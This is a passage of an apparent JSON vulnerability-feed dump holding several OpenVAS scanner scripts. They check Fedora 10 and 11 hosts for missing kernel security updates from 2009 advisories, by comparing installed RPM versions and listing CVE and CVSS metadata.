09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8684 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 
2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515867\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:59", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", 
"title": "Fedora Core 11 FEDORA-2009-8684 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64707", "href": "http://plugins.openvas.org/nasl.php?oid=64707", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8684.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8684 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix oops in clock_nanosleep syscall which allows an ordinary user to cause a\nnull ptr dereference in the kernel. CVE-2009-2767. 
Fixes BUG_ON() in the intel\ngem page fault code breaking GNOME Shell.\n\nChangeLog:\n\n* Sat Aug 15 2009 Kyle McMartin 2.6.29.6-217.2.8\n- CVE-2009-2767: Fix clock_nanosleep NULL ptr deref.\n* Fri Aug 14 2009 Kyle McMartin 2.6.29.6-217.2.7\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Thu Aug 13 2009 Kristian H\u00f8gsberg - 2.6.29.6-217.2.6\n- Backport 0e7ddf7e to fix bad BUG_ON() in i915 gem fence management\ncode. Adds drm-i915-gem-bad-bug-on.patch, fixes #514091.\n* Wed Aug 12 2009 John W. Linville 2.6.29.6-217.2.5\n- iwlwifi: fix TX queue race\n* Mon Aug 10 2009 Jarod Wilson 2.6.29.6-217.2.4\n- Add tunable pad threshold support to lirc_imon\n- Blacklist all iMON devices in usbhid driver so lirc_imon can bind\n- Add new device ID to lirc_mceusb (#512483)\n- Enable IR transceiver on the HD PVR\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8684\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8684.\";\n\n\n\nif(description)\n{\n script_id(64707);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8684 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515867\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.8.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:18", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", 
"title": "Fedora Core 10 FEDORA-2009-8264 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64551", "href": "http://plugins.openvas.org/nasl.php?oid=64551", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8264.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8264 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29\n\nFixes security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407\n\nChangeLog:\n\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\n* Mon Jul 27 2009 Chuck Ebbert 2.6.27.28-170.2.73\n- Linux 2.6.27.28 (CVE-2009-1895, CVE-2009-1897)\nDropped patches, merged in stable:\nlinux-2.6-kbuild-fix-unifdef.c-usage-of-getline.patch\nlinux-2.6-netdev-r8169-fix-lg-pkt-crash.patch\nNew config item:\nCONFIG_DEFAULT_MMAP_MIN_ADDR=32768\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8264\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8264.\";\n\n\n\nif(description)\n{\n script_id(64551);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8264 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512861\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=512885\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report 
+= res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.78.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2018-04-06T11:39:56", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8647 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064703", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064703", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8647.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8647 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. 
CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.27.29-170.2.79\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8647\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64703\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8647 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = 
